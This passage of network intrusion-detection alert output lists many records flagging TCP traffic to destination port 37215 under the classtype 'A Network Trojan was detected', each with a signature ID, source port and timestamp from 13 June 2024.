              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.354515
              SID:2829579
              Source Port:44276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555104
              SID:2835222
              Source Port:39772
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.091284
              SID:2835222
              Source Port:44058
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754122
              SID:2835222
              Source Port:41470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.242228
              SID:2835222
              Source Port:40586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.754794
              SID:2835222
              Source Port:51356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840020
              SID:2835222
              Source Port:45540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.404145
              SID:2835222
              Source Port:42600
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.247016
              SID:2829579
              Source Port:40050
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.097964
              SID:2835222
              Source Port:33344
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.566878
              SID:2835222
              Source Port:45320
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.888555
              SID:2835222
              Source Port:53346
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994703
              SID:2835222
              Source Port:52750
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886500
              SID:2829579
              Source Port:52618
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151927
              SID:2835222
              Source Port:38278
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.193036
              SID:2829579
              Source Port:33316
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.102257
              SID:2829579
              Source Port:34238
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275677
              SID:2829579
              Source Port:57874
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.751255
              SID:2829579
              Source Port:36844
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.373649
              SID:2829579
              Source Port:53590
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526652
              SID:2835222
              Source Port:60020
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.273102
              SID:2829579
              Source Port:52640
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.910104
              SID:2835222
              Source Port:34656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.355050
              SID:2829579
              Source Port:40970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.275822
              SID:2829579
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298132
              SID:2835222
              Source Port:39270
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.658603
              SID:2829579
              Source Port:49970
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.254377
              SID:2829579
              Source Port:32984
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416071
              SID:2835222
              Source Port:44128
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.871739
              SID:2835222
              Source Port:43142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276526
              SID:2829579
              Source Port:39482
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416901
              SID:2835222
              Source Port:48522
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.889154
              SID:2829579
              Source Port:50462
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.153960
              SID:2835222
              Source Port:52136
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.301119
              SID:2835222
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.420215
              SID:2835222
              Source Port:54690
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.214445
              SID:2829579
              Source Port:37774
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.272691
              SID:2829579
              Source Port:46110
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.298853
              SID:2835222
              Source Port:50832
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438139
              SID:2829579
              Source Port:46678
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.954813
              SID:2829579
              Source Port:50586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.528395
              SID:2835222
              Source Port:45418
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.371178
              SID:2829579
              Source Port:49244
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.830956
              SID:2835222
              Source Port:34368
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.169845
              SID:2835222
              Source Port:53960
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212250
              SID:2829579
              Source Port:54728
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.697163
              SID:2835222
              Source Port:42152
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266736
              SID:2829579
              Source Port:46612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.055747
              SID:2835222
              Source Port:53820
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836359
              SID:2835222
              Source Port:48914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824249
              SID:2829579
              Source Port:60018
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.567425
              SID:2835222
              Source Port:40990
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.041250
              SID:2835222
              Source Port:32914
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.405545
              SID:2829579
              Source Port:59390
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.195106
              SID:2829579
              Source Port:51936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.993673
              SID:2829579
              Source Port:52800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263888
              SID:2835222
              Source Port:51800
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168829
              SID:2835222
              Source Port:33864
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:34.215838
              SID:2835222
              Source Port:44150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.544921
              SID:2835222
              Source Port:43454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632941
              SID:2829579
              Source Port:44836
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.263248
              SID:2835222
              Source Port:33936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660522
              SID:2835222
              Source Port:55594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.608383
              SID:2829579
              Source Port:38948
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.480148
              SID:2829579
              Source Port:49294
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506697
              SID:2829579
              Source Port:42198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834492
              SID:2829579
              Source Port:50642
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.045128
              SID:2829579
              Source Port:49470
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.276970
              SID:2835222
              Source Port:59936
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824272
              SID:2829579
              Source Port:50796
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403885
              SID:2835222
              Source Port:33824
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.180526
              SID:2829579
              Source Port:59696
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.694394
              SID:2829579
              Source Port:60324
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.075279
              SID:2829579
              Source Port:34090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.416939
              SID:2829579
              Source Port:47712
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.709982
              SID:2835222
              Source Port:48176
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.087130
              SID:2835222
              Source Port:42060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.508263
              SID:2829579
              Source Port:52492
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.320670
              SID:2829579
              Source Port:37516
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.402784
              SID:2835222
              Source Port:48360
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707972
              SID:2835222
              Source Port:37592
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.941449
              SID:2829579
              Source Port:36198
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.126729
              SID:2829579
              Source Port:49014
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.151809
              SID:2835222
              Source Port:36114
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.029006
              SID:2835222
              Source Port:46634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.788828
              SID:2829579
              Source Port:58452
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.266676
              SID:2835222
              Source Port:40572
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.175359
              SID:2829579
              Source Port:48838
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707421
              SID:2829579
              Source Port:60634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.456310
              SID:2835222
              Source Port:42166
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.403315
              SID:2835222
              Source Port:36454
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.568897
              SID:2835222
              Source Port:37076
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.212494
              SID:2829579
              Source Port:50416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.565641
              SID:2835222
              Source Port:59738
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.912958
              SID:2835222
              Source Port:60266
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.214659
              SID:2835222
              Source Port:56726
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.932606
              SID:2829579
              Source Port:57962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.170307
              SID:2829579
              Source Port:57122
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.043031
              SID:2835222
              Source Port:59672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.221890
              SID:2829579
              Source Port:48142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.786622
              SID:2835222
              Source Port:42850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:46.526290
              SID:2829579
              Source Port:50612
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.994577
              SID:2835222
              Source Port:52596
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.632368
              SID:2829579
              Source Port:45918
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567810
              SID:2829579
              Source Port:48722
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:09.438035
              SID:2829579
              Source Port:56060
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506641
              SID:2829579
              Source Port:56922
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.269646
              SID:2835222
              Source Port:37788
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.756804
              SID:2835222
              Source Port:48092
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:57.136474
              SID:2829579
              Source Port:39598
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.248212
              SID:2829579
              Source Port:53638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556275
              SID:2835222
              Source Port:41042
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.656549
              SID:2829579
              Source Port:33560
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.631743
              SID:2835222
              Source Port:54098
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.126009
              SID:2835222
              Source Port:43670
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:56.758752
              SID:2829579
              Source Port:54054
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.842095
              SID:2835222
              Source Port:56204
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.834688
              SID:2835222
              Source Port:48786
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.728920
              SID:2829579
              Source Port:59112
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.108096
              SID:2835222
              Source Port:55512
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555062
              SID:2829579
              Source Port:53540
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.840985
              SID:2835222
              Source Port:38044
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:42.408738
              SID:2835222
              Source Port:33934
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:31:59.196806
              SID:2829579
              Source Port:43650
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546481
              SID:2829579
              Source Port:54536
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.836302
              SID:2829579
              Source Port:39102
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:25.993785
              SID:2829579
              Source Port:40862
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.571918
              SID:2829579
              Source Port:60672
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:17.695523
              SID:2835222
              Source Port:53912
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026167
              SID:2829579
              Source Port:56962
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.339707
              SID:2829579
              Source Port:60944
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.605886
              SID:2835222
              Source Port:57068
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.655698
              SID:2829579
              Source Port:47074
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.220493
              SID:2835222
              Source Port:41382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.345186
              SID:2835222
              Source Port:51276
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:17.304047
              SID:2829579
              Source Port:54794
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:44.453454
              SID:2835222
              Source Port:53636
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.629173
              SID:2835222
              Source Port:38450
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.222891
              SID:2829579
              Source Port:51224
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.613523
              SID:2835222
              Source Port:39932
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:02.909762
              SID:2829579
              Source Port:48374
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.276089
              SID:2829579
              Source Port:41634
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.359846
              SID:2829579
              Source Port:40322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.252742
              SID:2835222
              Source Port:32878
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708541
              SID:2829579
              Source Port:51314
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.274331
              SID:2829579
              Source Port:60942
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.223429
              SID:2829579
              Source Port:49896
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:52.660072
              SID:2835222
              Source Port:60382
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.887902
              SID:2829579
              Source Port:54808
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.609145
              SID:2829579
              Source Port:54414
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.726152
              SID:2835222
              Source Port:55704
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:00.886422
              SID:2829579
              Source Port:60840
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128007
              SID:2829579
              Source Port:39996
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:07.417987
              SID:2829579
              Source Port:47858
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.128340
              SID:2835222
              Source Port:52764
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.229592
              SID:2829579
              Source Port:40134
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:09.086088
              SID:2829579
              Source Port:59230
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.048039
              SID:2829579
              Source Port:38582
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.157406
              SID:2835222
              Source Port:57356
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:50.617477
              SID:2829579
              Source Port:52010
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:11.173948
              SID:2829579
              Source Port:52426
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.044493
              SID:2829579
              Source Port:46928
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316191
              SID:2835222
              Source Port:52322
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.555666
              SID:2829579
              Source Port:48296
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.506506
              SID:2835222
              Source Port:43218
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:15.259554
              SID:2835222
              Source Port:40630
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:11.484687
              SID:2835222
              Source Port:51586
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:30.093924
              SID:2829579
              Source Port:41032
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:05.346877
              SID:2829579
              Source Port:41364
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:21.780209
              SID:2829579
              Source Port:36430
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:05.016215
              SID:2829579
              Source Port:32910
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.546332
              SID:2829579
              Source Port:53534
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.707559
              SID:2835222
              Source Port:40850
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.841887
              SID:2829579
              Source Port:45118
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:03.295101
              SID:2835222
              Source Port:52272
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.567371
              SID:2829579
              Source Port:39416
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:32.168478
              SID:2829579
              Source Port:35436
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.028540
              SID:2829579
              Source Port:42846
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:13.213046
              SID:2835222
              Source Port:43778
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.317763
              SID:2835222
              Source Port:52594
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:58.824867
              SID:2829579
              Source Port:40180
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:40.372050
              SID:2835222
              Source Port:36160
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.568053
              SID:2829579
              Source Port:46956
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:07.060827
              SID:2835222
              Source Port:57946
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:01.218533
              SID:2829579
              Source Port:41150
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:15.611188
              SID:2829579
              Source Port:35638
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:23.934174
              SID:2835222
              Source Port:55090
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.026363
              SID:2835222
              Source Port:53608
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:48.556086
              SID:2835222
              Source Port:52656
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:38.316705
              SID:2835222
              Source Port:36186
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708072
              SID:2829579
              Source Port:43384
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:54.708960
              SID:2835222
              Source Port:35006
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:28.023887
              SID:2829579
              Source Port:47460
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:36.244864
              SID:2835222
              Source Port:35358
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:13.545930
              SID:2829579
              Source Port:45966
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:33:04.987716
              SID:2835222
              Source Port:49024
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/13/24-21:32:19.749527
              SID:2829579
              Source Port:48652
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
